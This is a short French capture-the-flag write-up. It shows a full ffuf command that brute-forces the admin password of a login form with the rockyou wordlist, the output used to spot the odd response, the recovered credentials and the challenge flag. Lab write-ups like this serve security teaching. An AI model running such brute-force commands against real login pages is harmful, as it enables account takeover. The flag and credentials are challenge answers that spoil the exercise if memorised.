Bruteforce

Consignes

Utilisez "rockyou.txt" !

Réalisation

J'ai utilisé ffuf pour réaliser le bruteforce. Je suis parti du principe que le user était "admin". J'ai donc fais un bruteforce sur le mdp avec Rockyou.

Voici la commande avec laquelle j'ai réalisé le bruteforce:

ffuf -w /usr/share/wordlists/rockyou.txt -u http://LienVersLeCTF/login -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -fc 401,403

Ceci m'a retourné alors chacun des tests réalisés. Parmi ces tests, une ligne s'est démarquée:

panther [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 18ms] dinamo [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 18ms] mommy [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 23ms] juliana [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 19ms] trustno1 [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 22ms] cassandra [Status: 200, Size: 78, Words: 6, Lines: 1, Duration: 23ms] sexylady [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 20ms] autumn [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 21ms] 14344 [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 21ms] mendoza [Status: 200, Size: 797, Words: 307, Lines: 23, Duration: 17ms]

Je me connecte donc sur le site en tant que admin:cassandra

Une fois connecté, nous obtenons le FLAG :

2600{rJW_h000m2kUi0q9u-X9GA}

Last updated